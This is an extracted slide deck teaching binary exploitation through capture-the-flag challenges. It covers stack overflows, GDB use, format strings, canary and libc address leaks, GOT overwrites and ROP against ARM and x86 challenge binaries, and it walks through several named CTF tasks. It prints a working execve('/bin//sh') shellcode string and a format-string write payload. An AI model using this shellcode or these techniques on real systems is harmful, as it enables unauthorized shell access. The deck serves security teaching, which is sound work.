Embed Size (px)
Citation preview
What is Capture The Flag?
• Hacking Game - For fun and get to know friends
• Free Training Course - To learn from best hackers in the world
• Techniques Playground - For practice
What is Exploitation?
• Broad Definition– Launch arbitrary attack against vulnerabilities.
• Narrow Definition– Launch control-hijacking attacks against vulnerable
binaries to get a privileged shell.
What kinds of vulnerabilities may lead to control-hijacking attacks?
• Memories bugs– Buffer overflow
• Stack overflow• Heap overflow
– Integer overflow• Number overflow• Array Index overflow
– Format String– Use after free
• Command Injection• Object Serialization in Scripting Language
Exploitation in CTFs vs Real World
• CTFs– Much smaller services– Designed with some Exploit tricks
• Real World– Large Software– Exploit difficulty varies from trivial to very hard
• Similarity– Vulnerability types– Basic Exploit Idea
OutLine
• Introduction to basic stack overflow• Detailed guide to solve a CTF exploit challenge• Overview of challenges in the world’s top CTFs
IO SmashTheStack Level05.c
ELF Format
• Executable and Linkable Format• 3 main types of object files
– relocatable file: gcc –c test.c => test.o(test.a)– executable file: gcc –o test test.c => test– shared object file: test.so
• Parallel views– Linking View– Execution View
ELF Header
Section Header Table
Program Header Table
gcc: -z execstack
About Stack
• Region of memory managed with stack discipline
• Grows toward lower addresses• Register %esp indicates lowest stack address
– address of top element• Stack Operations
– pushl -> %esp+4– popl -> %esp-4
byte
byte
…
byte
byte%espStack Top
Stack Bottom
Calling Convention(cdecl)
%ebp in caller’s caller
321
return address%ebp in caller
Memory Layout(Linux X86)
• Stack• Shared Libraries• Heap• Data(Global/Static)• Text
For Kernal
Stack
shared libraries
Heap
Data
Text
Unused
0xC0000000
0x40000000
0x00000000
0x08048000
0xFFFFFFFF
%esp
Stack Frame
arguments
return address
stack frame pointer
[exception handlers]
local variables
callee saved registers
For Kernal
Stack
shared libraries
Heap
Data
Text
Unused
0xC0000000
0x40000000
0x00000000
0x08048000
0xFFFFFFFF
%ebp
previous stack frame pointer
%esp
objdump –d level05
objdump –d level05char * strcpy ( char * destination, const char * source );
objdump –d –j <section name>
Buffer Overflow
char **argvint argc
return addressprevious %ebp
char buf[128]
Buffer Overflow
char **argvint argc
char buf[132~135]char buf[128~131]
char buf[0~127]
GDB
• Starting GDB– gdb program + run [arglist]– gdb –args program [arglist] + run– attach pid
• Stopping GDB– quit– Ctrl-d
GDB
• Breakpoints and Watchpoints– break function– break *addr– info break– clear function– delete/enable/disable [n]– watch expr– info watch
GDB
• Execution Control– continue(c)– step(s)– stepi(si)– next(n)– nexti(ni)
GDB
• Display– print [/f] expr
• x hex• d signed decimal• u unsigned decimal• o octal• t binary• a address• c character• f floating point
– info reg [rn]
GDB
• Display– x [/Nuf] expr
• N count of units to display• u unit size
– b bytes– h halfwords (two bytes)– w words (four bytes)– g giant words (eight bytes)
• f printing format– s null-terminated string– i machine instructions
– disassem [addr]
Buffer Overflow Exploit
char **argvint argc
evil code addressevil code
evil code
Contruct evil buffer:buf = evil_code + evil_code_address
Buffer Overflow Exploit
evil codeevil code
evil code addressUseless buf
Useless buf
Contruct evil buffer:buf = evil_code + evil_code_address
Shellcode
• What is shellcode– A small piece of code used as the payload in the
exploitation of a software vulnerability– Typically it starts a command shell from which the
attacker can control the compromised machine• What we use here
– We use execve system call to obtain a high-permission level shell
Shellcode
0
//sh
/bin
0
string
syscall calling convention%eax=0xb%ebx=filename%ecx=argv%edx=envp%esi%edi%ebp%esp
"/bin//sh"
CLTD converts signed long word EAX to double word EDX:EAX
int execve(const char *filename, char *const argv[], char *const envp[]);
Shellcode
Shellcode
SHELLCODE = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e \x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\
xcd\x80"
Exploit
• Construct Attacking Buffer– buf = NOP+SHELLCODE+RET_ADDRESS
• How to find return address– debuging– pattern_tool.py from metasploit
• “Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2A”
29c3 exp300
$ file update_serverupdate_server: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.24, BuildID[sha1]=0x2b6f57ce78b35f20551c1a807c1ed892851e1ed3, stripped
$ checksec.sh --file update_server
RELRO STACK CANARY NX PIEPartial RELRO Canary found NX disabled No PIE
x86 linux ELF
Stack is executable Stack has canaries
Protections
• RELRO– Relocation Read Only
• Stack Canary– Put a random value and verify it when function
returns• NX
– Stack/Heap/Static Area are not executable• PIE
– Base Address of TEXT is Random
Reverse Engineering
Input a version string
Output versions and input link
Input passwor
d
Print input version
Input < version
Input > version
Input == version
Copy input to version;Input Link
Password correct
len str0(version) \x00 str1 \x00 str2 \x00version Format:
Password Leak
buf[128]password
High Address
Low Address
If Input == version:
Canary&Addr LeakIf Input > version:
len str0 \x00 str1 \x00
gdb debuging command:
x/ns
Canary&Addr Leaklen str0 \x00 str1 \x00
buf[128]password[128]
stack canary
Return address
…
When building the stack guard, it has been traditionally important to have thevalue start (in memory) with a zero byte to protect the guard value (and therest of the stack past it) from being read via strcpy, etc.
This patch reduces the number of random bytes by one, leaving the leading zero byte.
fork() service Debugging
• attach– pause the client side to have time to attach
• set-follow-fork child– prepare everything in the gdb script
Exploit
buf
……
stack canary……
return address High Address
Low Address
Secuinside 2013 final:lockd$ file lockd
lockd: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.24, BuildID[sha1]=0xa1634b7876fee62858e02a5167e70be37a8e0c45, stripped
$ checksec.sh --file lockd
RELRO STACK CANARY NX PIE Partial RELRO Canary found NX enabled No PIE
Reverse Engineering
lock
Input Master Key
exit
unlock
Input floor and room number
Crack Master Key
buf[20]
pwd[20]
stack canaryebp
return address
Crack Master Key
Format String Vulnerability
syslog
Common format string attacks
• \xd4\x94\x04\x08\xd6\x94\x04\x08%54548x%4$hn%59639x%5$hn
0x80494d40x80494d6
%54548x%4$hn%59639x%5$hn
format string PTR
Unknown 4bytesUnknown 4bytesUnknown 4bytes
High Address
Low Address
How
abou
t static fo
rmat
string
?
Got Rewritten
• Redirect the Dynamic Call– memcmp(&dw1, unlock_input_key, 16u)– Memcmp => system– Dw1 => “bin/sh”
$ file lonetuna
lonetuna: ELF 32-bit LSB shared object, ARM, EABI5 version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.31, BuildID[sha1]=40da44f919a5bb95cbf91a44cd979dfd3fba7e43, stripped
$ readelf -l lonetuna
Program Headers: Type Offset VirtAddr PhysAddr FileSiz MemSiz Flg Align EXIDX 0x002e40 0x00002e40 0x00002e40 0x00008 0x00008 R 0x4 PHDR 0x000034 0x00000034 0x00000034 0x00120 0x00120 R E 0x4 INTERP 0x000154 0x00000154 0x00000154 0x00019 0x00019 R 0x1 [Requesting program interpreter: /lib/ld-linux-armhf.so.3] LOAD 0x000000 0x00000000 0x00000000 0x02e4c 0x02e4c R E 0x8000 LOAD 0x002f04 0x0000af04 0x0000af04 0x007a8 0x00bac RW 0x8000 DYNAMIC 0x002f10 0x0000af10 0x0000af10 0x000f0 0x000f0 RW 0x4 NOTE 0x000170 0x00000170 0x00000170 0x00044 0x00044 R 0x4 GNU_STACK 0x000000 0x00000000 0x00000000 0x00000 0x00000 RW 0x4 GNU_RELRO 0x002f04 0x0000af04 0x0000af04 0x000fc 0x000fc R 0x1
初步信息Arm linux ELF文件,开启 PIE
栈不可执行,考虑使用 ret2libc/ROP
3)程序退出
1 ) Change display text.2 ) Upload a new font.3 ) Exit.
1)输入 5个要显示的字符
2)上传字体
逆向分析创建新线程,监听一个随机端口,往该端口连接不断输出某字体字符
输入字体 buffer长度
输入字体 buffer
按照新字体修改显示缓冲区
运行示例
拒绝服务攻击
# nc 127.0.0.1 4321[ERROR] ipv4 bind() failed 62# nc 127.0.0.1 4321[ERROR] ipv4 bind() failed 62# nc 127.0.0.1 4321[ERROR] ipv4 bind() failed 62
• PPP拿到 lonetuna的firstblood后,俄罗斯MSLC队伍开始发起DOS攻击,主办方不允许消耗带宽和CPU资源的DOS攻击,但允许利用服务本身的问题进行的低速攻击
• lonetuna 服务每接收一个连接就会监听一个一定范围内(范围不大)的端口,如果监听失败则未做异常处理,程序退出,攻击者可以通过大量占用监听端口,导致新的连接总是监听失败
• Patch方法:添加异常处理,监听失败则端口号 +1,重新监听
字体格式分析• 点阵字体长 x宽为 14x12,一共
14x12=8x21个点阵,用 0/1表示点是否存在,需要使用 21个字节来表示
• 可见字符的 ASCII码范围 0x20~0x7e,某字符使用字体 i,则其索引值就为 i,格式如下
字体总数n
校验标识
字体0
字体1
…字体n-1
校验标识
字符0x20索引
…
字符0x7e索引
字符0x21索引
libc地址泄露• ASLR开启,必须知道地址才能进一步 ROP• 字体 buffer最终会保存至栈上,如果字符索引超出,则会将栈上额外数据当做字体,显示出来,我们可以用显示出来的畸形字体,还原出栈上的数据
• 栈上必然有 main()的返回地址: libc中__libc_start_main函数中某指令地址,泄露其地址即可计算出 libc基址
libc地址泄露• 示例:
栈溢出
栈上为 font_buf预留 0x820字节,接收 font_buf长度检查为 0x1550字节,产生溢出
exploitation
• objdump+grep搜索 libc中的 gadget
• ret2libc/rop–计算出 system()和 gadget地址,然后通过溢出漏洞调用 system(“/bin/sh”)即可,注意使用上面的pop r0, r4, pc来传递参数( r0为第一个参数)
– Libc中已有” /bin/sh”字符串
DEMO
• http://ascii.io/a/4972• Exploit代码: http://pastebin.com/
2c6bU7bX
防御
我们使用的方法:限制 buffer长度检查,使其刚好不溢出即可(无法防止地址泄露)
dc21 trouver
$ file trouver-lbs-patched
trouver-lbs-patched: ELF 32-bit LSB shared object, ARM, EABI5 version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.31, BuildID[sha1]=f25403d073588063d38ad70ec88be412684b3b1f, stripped
$ readelf -l trouver-lbs-patched |grep STACK GNU_STACK 0x000000 0x00000000 0x00000000 0x00000 0x00000 RW 0x4
初步信息Arm linux ELF文件,开启 PIE
栈不可执行,考虑使用 ret2libc/ROP
重命名文件
创建文件
列举文件
逆向分析 &漏洞挖掘
登陆
初始化 tmp下目录
文件名列举结果buffer长度限制产生 1个 byte溢出( 0x200变成0x20a)
漏洞利用• 利用列举文件的溢出打印出栈上数据( libc地址泄露)
• 再次利用溢出• ROP注意事项: getdents系统调用( 141号)会按照字典序排列文件名
Skill List
• Reverse Engineering/Assembly• Understand Architecture with OS• Linux Command• Scripting
– python• Debugging Tools
– gdb• Vulnerabilities• Exploit Techniques
– Ret2Libc– ROP
Learn by Practice
• Participating CTFs• Wargames
– exploit-excercises.com– io smash the stack
• Open Courses
